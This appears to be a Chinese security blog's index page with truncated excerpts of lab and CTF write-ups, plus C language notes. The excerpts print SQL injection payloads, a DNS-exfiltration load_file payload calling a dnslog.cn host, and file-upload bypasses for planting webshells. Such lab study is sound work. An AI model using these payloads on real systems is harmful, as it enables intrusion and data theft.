zkaq-include
说实话现在的状态真的是难受的一批,想睡又睡不着,闹钟浑浑噩噩的,索性从床上爬起来写一下刚学的题吧 题目文件包含 代码审计全局搜include 代码审计优先级,直接传参大于间接传参 所以跟进 index.php文件下的include $_REQUEST[‘target’]; 进行分析 12345(! empty($_REQUEST['target']) //这里判断传进来的参数是否是空的,若不是返回true && is_string($_REQUEST['target']) //这里判断参数是否是字符串,若是返回true && ! preg_match('/^index/', $_REQUEST['target']) //这里判断参数是否是index开头的,若不是则返回true && ! in_array($_REQUEST['target'],...
C语言笔记
标识符用来标识数据类型,变量,函数,语句的符号 类别 关键字 数据类型关键字 char,double,enum,float,int,long,short,signed,struct,union,unsigned,void 控制语句关键字 break,continue,case,do,default,else,for,goto,if,return,switch,while 存储类型关键字 auto,extern,register,static 其他关键字 const,sizeof,typedef,volatile 数据类型 常量和变量 常量:值一直不变的量 变量:值可以变化的量 变量定义格式 1类型说明符 变量名; eg: 1int variable; //定义一个整形变量 整形变量 short int 短整型 2 int 整型 4 long int 长整型 4 unsigned short 无符号短整型 2 unsigned int 无符号整型 4 unsigned...
CTF-show
WEB板块web签到题查看源码 base64解码 1ctfshow{6d8d8144-c200-4f8e-801c-23b7a1cd2403} web2用户名输入 1' or 1=1 -- a //成功登录 判断字段数 1234' or 1=1 order by 3 -- a //页面正常' or 1=1 order by 4 -- a //页面不正常 判断有3个字段 判断回显位 构造 1'or 1=2 union select 1,2,3 -- a //页面出现2,数字2处为回显位 爆库名 构造 1'or 1=2 union select 1,database(),3 -- a' 爆表名 构造 123'or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 -- a'...
zkaq-数据库注入
MYSQL 注入 - Dns注入前置知识1.dnslog 1用来记录dns被解析的信息 2.dns注入思路 进行注入攻击时,页面无正常回显,使用第三方dnslog平台,通过记录dns解析的信息外带注入数据,将盲注转化成显错注入。 靶场实践判断是否存在注入攻击时遇到waf 使用参数污染进行绕过 构造 1id=2/*&id=1 and sleep(3) -- a*/ //页面延时响应,判断存在注入点 爆库名 构造 1id=2/*&id=1 and (select load_file(concat("\\\\",database(),".zlmwoy.dnslog.cn\\1.txt"))) -- a*/ 爆表名 构造 1234id=2/*&id=1 and (select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema=database()...
zkaq-upload-labs
Pass-01 前端检测文件格式,不允许上传PHP文件 bp抓包,改名 冰蝎连接 Pass-02上传文件,抓包,修改 Content-Type 冰蝎连接 Pass-03不允许上传”.asp”、”.aspx”、”.php”、”.jsp”文件 上传文件抓包 冰蝎,连接 Pass-04线上传一个.htaccess文件 该文件“告诉”后端服务器,将jpg文件当做php文件执行 上传将php一句话木马文件后缀改为jpg 上传 Pass-05大小写绕过 文件改名,后缀用大写。 冰蝎连接 Pass-06文件后缀空格绕过 冰蝎连接 Pass-07文件尾加.绕过 冰蝎连接 Pass-08 冰蝎连接,连接时将 ::$DATA...
zkaq-SQL
post注入post传参类型的注入,与get注入很像。post注入经常出现在登录框且通常是字符型。 靶场演练Pass-051构造' or 1=1 -- a 成功登录,判断的我们的输入的数据有被当做SQL语句执行。 构造 12' or 1=1 order by 3 -- a登录成功' or 1=1 order by 4 -- a登录失败 判断页面有三个字段 暴库名 构造 1'union select 1,2,database() -- a 暴表名 构造 1'union select 1,2,table_name from information_Schema.tables where table_schema=database() limit 0,1 -- a 暴字段 构造 1'union select 1,2,column_name from information_Schema.columns where table_schema=database() and...











